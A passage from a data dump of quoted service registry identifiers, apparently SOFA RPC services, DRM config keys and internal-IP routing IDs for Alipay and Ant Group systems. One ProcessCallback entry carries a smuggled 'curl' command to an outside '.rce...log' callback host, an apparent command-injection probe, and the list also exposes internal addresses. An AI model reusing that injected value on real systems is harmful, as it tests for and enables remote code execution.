T#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amlcloud.common.service.facade.api.CrrOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.newFortuneHomePagePidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.dataset.DataPointService:1.0:${targetserver.type}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.facade.api.AbilityBaselineConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.common.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INFOSECTASK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.empty.api.PointEmptyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.bankcard.facade.ThinQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.afts.common.service.facade.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpmscore.facade.IssueFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cssocial.common.service.facade.YqMessageStatusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:accordercore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.BloodService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.api.service.facade.service.DataStreamStorageService:1.0:databus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:curl http://86842598-80102053-uniqueId-104003022.rce.noble.log.lynnshare.cc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebMftransQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promox.facade.assets.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dsoc.service.facade.api.runtime.VerifyTaskService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.53.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.auth.api.AuthUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fatigueOpenScenes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_INDUSTRY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.flowAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.swiftweb.facade.DeploymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.exchange.InsLifeMktPrizeExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationPersonSideStrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.spi.SpiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.consumeRecord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.tradeEventRefundMsgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.GeneralAttributeScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.ActivityPermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.spi.search.service.DazzleSearchSpiService:1.0:mfinbaseprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofabootrpcdemo.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.lendpofprod.common.service.facade.api.arrangement.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.f2fpay.F2fPayTickSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.rt.service.RtCalcQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.invoice.InvoiceNewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininflux.common.service.facade.rzone.FluxInvokeRService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.OutboundAiTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineGroupOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.headercontent.api.HeaderContentProductionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.bank.ParaBankManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.RuleCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpSystemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.manage.ComputationTripletVOMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.findecision.core.notify.NotifyConfig.ivrExternalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.forest.BackgroundOperationLogFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireBatchOrderCreateAndPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.dashboardCollectLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imnotify.common.service.facade.NotifyConfigNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.common.service.facade.api.OrderCreateAndPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyfbi.common.service.facade.alert.AlertControllerMigrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.UserProfileByMonthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.ForestEnergyFlowFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowSyncNotificationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:testrrmm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.partner.PartnerApiFiledsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.rest.meta.RestMetaLockService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_user_notify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketensip_busiop_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsTransferOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.QueryValidateProductRepositoryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_IGDMC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudprod.facade.meta.MetaServiceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.dynamic.facade.service.PromoPackPageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-loginsession-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.common.service.facade.protocol.ProtocolQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:${rule_service_unique_id}@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zplayback.playback.service.LogicZoneInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.common.service.facade.CqcBranchRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.StockUserRelaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.28.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:authprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.113.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imtmsvcprod.common.service.facade.face.FaceFeatureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.merchant.MerchantPassNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.dynamiccode.DynamicCodeMiniAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmorse.facade.MorsePsiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.179.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.treasurebag.rule.service.FliggyNameListFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.vtask.TaskContentRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.biz.check.spi.DetectService:1.0:gray_ecocheck_create_project@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloanuserproxy.facade.api.AuthorizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FundRuleDetailRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.charityasset.common.service.facade.api.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.194.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.181.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bstsolprod.serviceareapromo.inner.facade.api.ServiceAreaPromoInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finsign.common.service.facade.account.service.FinsignAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbstaffcenter.common.service.facade.processor.StaffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.biz.service.msgbroker.facade.SaftyCertifyReleaseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.trigger.BizChangeCheckCallbackService:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.beike.BeikeBenefitDayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.checker.facade.api.CampDefinitionQueryCheckerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:insuranceprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.alipayMixVoucher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodmng.facade.pd.ProductConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.badge.BadgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccdc.common.service.facade.CardInfoGzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpBudgetPlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:itemAuditFinishPunisher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zcache.tbase.ipciConfigTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianquery.digestquery.common.service.PolicyDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:antlegalchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.13.149.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.23.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.back.DeploymentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-officeingress@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.qrcode.spi.QrCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcCaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.contract.service.InstContractDigestManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.SettleProductOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgChannelMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.ssl.SslServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.idcDomainSwitch:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_foutransTddlDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finauth.common.service.facade.task.TaskCallBackFacade:1.0:accountResultQueryTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.64.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileorderprod.service.api.mng.TriggerConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.activity.MerchantExpandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.BusinessSystemService:1.0:businessSystemService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.EbppSaleProductManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.backstage.IpaySourceQuoteMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.AssetProductInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.RuleTempletFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.BizZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:yebprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.researchprod.FundMaxDrawdownQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_DWDSSP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qconsole.facade.TrafficInspectionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.hostParamCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdswindspeed.facade.drawnmonitor.DrawnMonitorQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.speechscene.SpeechQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.mini.MiniScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm70#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ismonitor.common.service.facade.auto2.AutoMonitorFacade:1.0:csbizcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.216.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","alipaymember@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zonemng.facade.api.OpsLockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ilogin.common.service.facade.api.oauth.OAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.46.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mlscfilefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.ChannelAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.resource.common.facade.api.SearchOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acordercore.common.service.facade.event.OrderEventCompensationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantHsfServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.midasCommonTair.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.102.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityHbaseConfigResource.nullRowkeyProcessRatio,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_DISSEMINATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.196.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsecu.realtimequota.RealTimeQuotationIncrementDataListener:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.rest.PaasOperateRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-${GROUP_ID}#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finhadecision.common.service.facade.api.IndicatorVariableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdecisioncenter.common.service.facade.rule.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.innertrans.common.service.facade.api.InnerTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.shop.RecomShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adcharge.common.service.facade.api.admin.AdAdminServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskxm.common.service.facade.RiskBasicConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxbase.common.event.EventHandler:1.0:ifxquoteClientRateReceiveHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilesearchmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.mesh.initSDKWithMesh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:gzmsfesa-sffminipkg#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fporgassetnet.common.service.facade.api.OrgInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-sandboxhome-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antmember.common.service.facade.UserPropService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.prod.ZhouZhouLeTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadatacenter.facade.api.AppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.words.AppxEntityWordsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.partner.PartnerApiFiledsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.SalesProductService:1.0.0:salesProduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ACIAMCONSOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gray:name=com.alipay.grayprod.change.drm.ChangePolicy.openDataCollect,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.SysCallMsgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.150.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.251.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.fliggy.fcecore.service.AlipaySSUDetailService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcaplatformunit.common.mobile.service.GreenFinanceProfitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.216.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:CUSTOMEREXP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.PlanDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hainaprod.common.service.facade.api.mini.market.SceneConfigAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isv.common.service.facade.UserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.a